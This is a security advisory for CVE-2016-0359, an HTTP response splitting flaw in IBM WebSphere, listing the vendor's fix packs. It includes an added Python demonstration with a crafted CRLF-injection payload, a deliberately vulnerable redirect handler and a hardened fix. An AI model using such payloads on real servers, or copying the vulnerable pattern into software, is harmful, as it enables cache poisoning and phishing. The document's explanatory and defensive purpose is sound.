HTTP response splitting attacks - CVE-2016-0359


Published: June 29, 2016 / Updated: July 1, 2016


Vulnerability identifier: #VU49
CSH Severity: Medium
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/U:Green
CVE-ID: CVE-2016-0359
CWE-ID: CWE-113
Exploitation vector: Remote access
Exploit availability: No public exploit available
Vendor: IBM
Affected software: WebSphere Application Server (Liberty and Full Profile)

Detailed vulnerability description

The vulnerability allows a remote attacker to conduct HTTP response splitting attacks.

The vulnerability exists because CR/LF sequences in request data are not neutralized before that data is written into HTTP response headers (CWE-113). A remote unauthenticated attacker can submit a specially crafted URL that causes the target server to return a split response: the injected line break ends the legitimate header early, and everything after it is treated by the client or proxy as further headers and a second, attacker-authored response.

Successful exploitation of this vulnerability may allow an attacker to poison the cache of an intermediate proxy server and display arbitrary content in the victim's browser. Because the injected response appears to come from the legitimate origin, the attacker might be able to steal potentially sensitive information, change the appearance of the web page, and perform phishing and drive-by-download attacks.
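The splitting mechanism described above, shown end to end as an added example that is not part of the original advisory and is not IBM's code. A hypothetical redirect handler reflects a "next" query parameter into the Location header; the crafted, URL-encoded parameter value is constructed here; a small proxy-style parser shows how one write from the server is read as two responses on the wire; and a hardened handler shows the generic CWE-113 check (rejecting control characters) rather than the vendor's actual patch.

```python
"""HTTP response splitting, demonstrated end to end.

Added example, not code from the advisory or from IBM WebSphere.  The
redirect handler, its "next" parameter and the proxy-style parser are all
assumptions made for illustration; the crafted input is constructed here.
"""
from urllib.parse import unquote

# Constructed attacker input: the URL-encoded value of a hypothetical "next"
# query parameter that the vulnerable handler reflects into a Location header.
CRAFTED_NEXT = (
    "/home%0d%0a"                    # CR LF terminates the Location header early
    "Content-Length:%200%0d%0a"      # give the first response an empty body ...
    "%0d%0a"                         # ... and end its header block
    "HTTP/1.1%20200%20OK%0d%0a"      # second, entirely attacker-authored response
    "Content-Type:%20text/html%0d%0a"
    "Content-Length:%2018%0d%0a"
    "%0d%0a"
    "<html>pwned</html>"             # 18 bytes, matching the Content-Length above
)


def build_redirect_vulnerable(next_url: str) -> bytes:
    """Vulnerable handler: the decoded parameter goes into a header unchecked."""
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {next_url}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("latin-1")


def build_redirect_hardened(next_url: str) -> bytes:
    """Hardened handler: refuse any value that could break out of a header.

    Rejecting CR, LF and other control characters is the generic CWE-113
    mitigation.  It is applied in the handler here so the example stays
    self-contained; a vendor fix such as APAR PI58918 would live in the
    server's own header-writing code instead.
    """
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in next_url):
        raise ValueError("control character in header value")
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {next_url}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("latin-1")


def parse_stream(raw: bytes) -> list[dict]:
    """Read a byte stream the way a simple caching proxy would: status line,
    headers, then Content-Length bytes of body, repeated while another
    status line follows.  One request yielding two parsed messages is the
    condition that lets the second one be cached and served to other clients."""
    messages = []
    pos = 0
    while True:
        while raw[pos:pos + 2] == b"\r\n":      # skip CRLFs between messages
            pos += 2
        if not raw[pos:].startswith(b"HTTP/"):  # no further status line
            break
        end = raw.find(b"\r\n\r\n", pos)
        if end < 0:
            break
        lines = raw[pos:end].decode("latin-1").split("\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        body_start = end + 4
        length = int(headers.get("content-length", "0"))
        messages.append({
            "status": lines[0],
            "headers": headers,
            "body": raw[body_start:body_start + length],
        })
        pos = body_start + length
    return messages


def hardened_rejects(encoded_value: str) -> bool:
    """True if the hardened handler refuses the (URL-encoded) parameter."""
    try:
        build_redirect_hardened(unquote(encoded_value))
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    split = parse_stream(build_redirect_vulnerable(unquote(CRAFTED_NEXT)))
    print(f"vulnerable handler: {len(split)} responses on the wire")
    print("second status line:", split[1]["status"])
    print("hardened handler rejects crafted value:", hardened_rejects(CRAFTED_NEXT))
```

The parser is deliberately lenient, like many proxies and browsers of the era: it accepts whatever follows the first message as long as it starts with a status line. That leniency, not a bug in the parser, is what turns the injected bytes into a second cacheable response. The same check used in the hardened handler belongs on every request-derived value that reaches a header (redirect targets, cookie values, content-disposition filenames), and a decoded value should be checked after decoding, as here, since "%0d%0a" is harmless until it is turned back into CR LF.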

How to mitigate CVE-2016-0359

The recommended solution is to apply the interim fix, Fix Pack or PTF containing APAR PI58918 for each named product as soon as practical.

For WebSphere Application Server:
For V8.5.0.0 through 8.5.5.9 Liberty:
Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix PI58918
--OR--
Apply Liberty Fix Pack 16.0.0.2 or later (targeted availability 24 June 2016).

For V8.5.0.0 through 8.5.5.9 Full Profile:
Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix PI58918
--OR--
Apply Fix Pack 8.5.5.10 or later (targeted availability 15 August 2016).

For V8.0.0.0 through 8.0.0.12:
Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix PI58918
--OR--
Apply Fix Pack 8.0.0.13 or later (targeted availability 24 October 2016).

For V7.0.0.0 through 7.0.0.41:
Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix PI58918
--OR--
Apply Fix Pack 7.0.0.43 or later (targeted availability 2Q2017).
